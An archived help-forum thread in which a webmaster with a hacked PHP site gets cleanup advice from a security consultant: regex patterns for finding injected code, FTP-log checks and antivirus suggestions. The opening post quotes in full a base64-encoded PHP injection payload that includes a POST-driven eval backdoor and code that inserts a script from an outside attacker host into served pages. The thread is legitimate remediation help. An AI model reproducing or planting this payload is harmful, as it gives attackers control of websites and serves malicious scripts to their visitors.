BadwareBusters - Messages tagged with: js

I have sent you a zip containing the source of the s...

contact@badwarebusters.org (odinn) — Sun, 21 Feb 2010 08:08:26 -0500

I have sent you a zip containing the source of the site.

Thank you.

Those are bad as well. use this search string: ...

contact@badwarebusters.org (WeWatch) — Sun, 21 Feb 2010 07:38:30 -0500

Those are bad as well.

Use this search string:

<kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>.*?<\/kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>

To find and remove those.

Can you zip those files and send them to me in an emai?. I’d like to analyze them further.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

I am the only one that accesses the ftp and manager ...

contact@badwarebusters.org (odinn) — Sun, 21 Feb 2010 07:33:59 -0500

I am the only one that accesses the ftp and manager (all the tools are online nothing is installed on my pc). I am now cleaning the tags that I found.

One more thing. I have also noticed new tags:

< kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5 > < / kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5 >

with and without text between them.

I believe that you'll find a virus on either your pc...

contact@badwarebusters.org (WeWatch) — Sun, 21 Feb 2010 07:03:53 -0500

I believe that you’ll find a virus on either your PC or the PC of someone who has/had FTP access to your website.

In removing the base64_decode strings, you’ll be removing backdoors as well.

Do you have access to the FTP logs? If so, scan those to see the IP addresses of file transfers that show the files you’ve been seeing getting infected. Chances are you’ll see some strange IP addresses sending files to your site. Those people obtained FTP access by a virus.

One thing I have people do is to assign a different login name to anyone who needs FTP access to their site. That way, if your site gets infected, you can scan through the FTP logs and see which login name was used. They’re the one who has a virus.

Post back…

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

Great thanks! i did not know that there is a grep pr...

contact@badwarebusters.org (odinn) — Sun, 21 Feb 2010 06:58:58 -0500

Great thanks! I did not know that there is a grep program for windows :)

I will scan the files with grep and replace the bad code.

The question is… How do I scan my code for the source of the problem… If let’s say Avast finds nothing on my PC and I upload the clean code I still need some sort of a code scanned that will help me find the cause of the problem and eliminate it so it won’t happen again… Or is it a problem that no one found a solution for yet?

I had been recommending avg however, lately i've see...

contact@badwarebusters.org (WeWatch) — Sun, 21 Feb 2010 06:54:15 -0500

I had been recommending AVG however, lately I’ve seen many viruses getting past them.

Many have had good success with Avast, F-Prot or Kaspersky.

Ok, download grepWin here: http://code.google.com/p/grepwin/downloads/list, I usually take the .msi file.

Then install it on the PC with access to the full set of files from the website.

Open it and in the top line, use the button with … to navigate to the main folder where the website files reside.

Then set the following options (I’ll provide you with search strings further down):

Select Regex search
uncheck Search case-sensitive
check Dot matches newline
check Create backup files
uncheck Treat files as UTF8

select All sizes
check Include system files
check Include hidden files
check Include subfolders

Now for the search strings. You have to use them one at a time.

First to eliminate the base64_decode strings use:

<\?php eval$base64_decode\([\'|\".*?[\'|\"]$\); \?>

This will remove not only what you found above, but other variations.

I believe that if you found malscripts in the .js files, they probably started with document.write. Am I correct? If so, then use this string to eliminate them:

document\.write$'<script src=http:\/\/.*?\.php ><\\/script>'$;

Then, first select Search with the first search string to see in the Search results window what files it finds that match. If you right-click on the first one you can open it with Wordpad to verify that it does include the base64_decode string.

Then hit Replace. This will not only remove the malscript from all the files, but will also make a backup of the original file.

Upload the clean files to your website and you should be clean.

Post back here with any questions or updates please.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

Thank you for the quick reply. yes i can download th...

contact@badwarebusters.org (odinn) — Sun, 21 Feb 2010 06:38:33 -0500

Thank you for the quick reply. Yes I can download the entire site to my PC and I do have a backup downloaded already with the problem.

Please provide me with instruction on how to scan the files.

What program do you recommend for the virus scan… The company I work for is a small one and they chose to use AVG…

Thanks.

Scanning your site from the "outside" won't find the...

contact@badwarebusters.org (WeWatch) — Sun, 21 Feb 2010 06:28:00 -0500

Scanning your site from the “outside” won’t find the eval(base64_decode strings because those are in .php files which will render when accessed from the outside.

Your site needs to be scanned while not viewing from the outside. Do you have the entire site downloaded to your PC? If so, I can provide you with instructions on how to scan your files quickly. If not, we can do this for you.

Often times the virus that steals FTP passwords knows how to evade detection of the currently installed anti-virus program so you may need to use a different program in order to really determine if your PC is virus free.

Please post back here with your questions or updates.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

Added tags with eval in them (base64 encrypted code)...

contact@badwarebusters.org (odinn) — Sun, 21 Feb 2010 04:31:48 -0500

Hey.

I started working on a site that was almoust done. My job was to finish it.
While working on this site Google tagged it.

I was going through the code and some strange code was added:

e.g:

<?php eval(base64_decode(‘aWYoIWZ1bmN0aW9uX2V4aXN0cygnazVyaGQnKSl7ZnVuY3Rpb24gazVyaGQoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZ1WjNKNUxXRnVaMlZzY3k1a1pTOWpiMjUwWlc1MEwzSnZZbTkwY3k1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBrNXJoZDIoJGEsJGIsJGMsJGQpe2dsb2JhbCRrNXJoZDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGs1cmhkMSkpY2FsbF91c2VyX2Z1bmMoJGs1cmhkMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nazVyaGQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdrNXJoZCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRrNXJoZGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2s1cmhkMicpKSE9J2s1cmhkMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7’)); ?>

Translated:

if(<img title="$a=@set_error_handler('k5rhd2')" />=‘k5rhd2’)?$a:0;eval(base64_decode($_POST[‘e’]));

And it added <sc ript src="http://...."></sc ript> to the .js files…

Meaning, they are also running their own php scripts on our site and also adding the code I have showed you earlier…

I have changed the password to my ftp/site admin page.
I am using hostmonster.com as a host.

The code that I am working on was written by other people and it is a bit large and has alot of rewritten parts in different files.

The problem is that I can’t scan manually for any input checks and etc.. because I will get lost…

The website is : http://www.jobzone.co.il/index_temp.php and http://www,jobzone.co.il/

The first one got a bit defaced by a recent attack so it has lot’s of question marks… You can translate http://www.jobzone.co.il with Google. The website is in hebrew… Sorry.

I would appreciate if you scan the website and tell me where the problem may be… I know what code it injects I need to know where is the security hole that causes it…

If you can also please recommend a decent (if possible free) scanning tool.

My AV software found no viruses or trojans or infected cookie files on my pc. I will check the other PCs aswell.

Thank you in advance!
Odinn.

Help with site malware...

contact@badwarebusters.org (Heavypen) — Tue, 10 Nov 2009 11:34:29 -0500

Site in question – www.nationwidebackgroundchecks.com
Just found out that this site has malware… a bit of a noob with this. Where do I look to get rid of this?